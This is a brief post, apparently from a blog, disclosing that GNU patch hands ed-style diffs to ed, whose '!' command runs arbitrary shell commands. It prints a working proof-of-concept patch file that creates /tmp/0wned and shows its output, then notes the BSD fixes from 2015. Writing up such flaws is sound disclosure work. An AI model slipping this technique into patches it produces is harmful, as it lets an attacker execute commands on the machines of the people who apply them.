patch runs ed, and ed can run anything
Okay, this is kind of awesome, if you like watching the world burn.
The short version is: patch runs ed... and ed can run arbitrary commands, including when it's called from patch.
Check this out. I've taken the proof of concept and changed it slightly:
$ cat evil.patch --- /dev/null 2018-13-37 13:37:37.000000000 +0100 +++ b/beep.c 2018-13-37 13:38:38.000000000 +0100 1337a 1,112d !touch /tmp/0wned; ls -la /tmp/0wned . $ patch < evil.patch ? ? -rw-r--r-- 1 edu users 0 Apr 5 10:42 /tmp/0wned ? patch: **** /usr/bin/ed FAILED $
This came up as part of the discussion on the "beep exploit" yesterday. I found it buried in the HN /new queue as a simple link to the Debian bug tracker.
This seems far too good to leave hidden in there.
Subprocesses, am I right?
Late update: it looks like FreeBSD fixed this same sort of thing in 2015. GNU patch, however (shown above), clearly has not.
Another update: OpenBSD also patched it in 2015. It looks like they had it first, which I suppose makes sense. Also, I'm hearing it can't exec other programs any more, which is pretty awesome. That's the right way to close this kind of door.